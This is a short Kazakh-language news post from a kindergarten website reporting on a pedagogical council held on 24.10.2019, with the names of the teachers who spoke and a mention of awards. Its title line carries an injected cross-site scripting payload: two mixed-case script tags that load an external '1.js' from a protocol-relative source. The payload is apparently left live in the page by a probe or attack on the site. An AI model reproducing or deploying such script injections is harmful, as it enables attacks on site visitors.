"Мектепке дейінгі білім берудің жаңартылған мазмұны"<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

24.10.2019

"Еркежан" балабақшасында "Жаңа оқу жылында МДҰ оқу-тәрбие жұмысын ұйымдастыру" тақырыбында педагогикалық кеңес өтті.  Педагогикалық кеңестің тәжірибелік бөлімінде тәрбиешілер Н.С.Дудкина, К.Е.Нургалиева және С.Ш.Аканова "Мектепке дейінгі білім берудің жаңартылған мазмұны" тақырыбында баяндама жасап, МДҰ-дағы оқу-тәрбие үдерісін жоспарлау туралы баяндап берді. Кеңес "Күн кімге жарқырайды…." ойыны.  Балабақша әдіскері Серікпаева А.Д. В.Воскобовичтің технологиясы бойынша "Ертегі лабиринты ойындар" тақырыбына баяндама дайындады. Дәстүр бойынша меңгеруші Ж.Е.Толғамбаева МДҰ-да өткізілген топтарды оқу жылына дайындау бойынша байқау қорытындысын шығарды, жеңімпаздар дипломмен марапатталды. Педкеңес конструктивті жағдайда өтті және кәсіби білім мен іскерлікті арттыруға мүмкіндік берді.

Просмотров: 542


Пікір қосу



Деректерді қолтаңбаға қосу
Текст